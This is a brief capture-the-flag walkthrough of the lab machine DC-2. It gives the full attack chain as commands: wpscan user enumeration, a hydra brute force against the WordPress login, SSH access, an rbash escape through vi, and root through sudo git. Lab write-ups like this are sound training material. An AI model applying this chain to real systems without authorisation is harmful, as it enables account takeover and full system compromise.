DC‑2 is a WordPress machine where user enumeration and password brute forcing lead to SSH access.
Privilege escalation is achieved via git abuse with sudo.
Target: DC‑2
Initial vector: WordPress → wpscan → hydra → SSH
Privilege escalation: sudo git → GTFOBins
Identify WordPress:
Source: WordPress 4.7.10
Enumerate users:
$ wpscan --url http://dc-2 --enumerate -> admin, tom, jerry
Brute force passwords:
$ hydra -L users.txt -P dict-5.txt 192.168.159.194 \ http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:incorrect" -t 64 -> tom:parturient -> jerry:adipiscing
SSH as tom:
$ ssh tom@dc-2
Shell is restricted (rbash). Bypass via vi:
$ vi :set shell=/bin/bash :shell
Switch to jerry:
$ su jerry Password: adipiscing
Check sudo:
$ sudo -l -> /usr/bin/git
Use GTFOBins for git:
$ sudo git -p help config !/bin/bash # id; whoami